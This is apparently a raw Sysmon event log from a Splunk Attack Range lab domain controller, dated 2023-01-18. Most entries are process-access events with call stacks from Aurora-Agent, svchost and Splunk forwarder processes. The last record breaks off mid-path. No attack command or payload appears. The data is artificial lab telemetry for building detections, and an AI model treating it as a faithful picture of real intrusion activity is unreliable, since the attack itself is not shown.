10341000x800000000000000041391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.106{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.106{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.106{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.106{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.106{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E411-63C7-1E06-00000000AF02}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.106{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E411-63C7-1E06-00000000AF02}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.107{FE4C2B44-E411-63C7-1E06-00000000AF02}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016141Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.664{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99777B9877CE11092C3C01BF1A911429,SHA256=2022186B79B938FCDE8CBAB31EF9C41F6A63CC4878C625D0E0FFA0FC9AC74542,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.899{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.898{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.897{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.897{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.895{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.885{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 354300x800000000000000041422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:32.589{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56279-false10.0.1.12-8000- 10341000x800000000000000041421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.869{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.843{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.816{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.809{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.807{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.803{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.790{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.788{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.785{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000041406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.586{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF 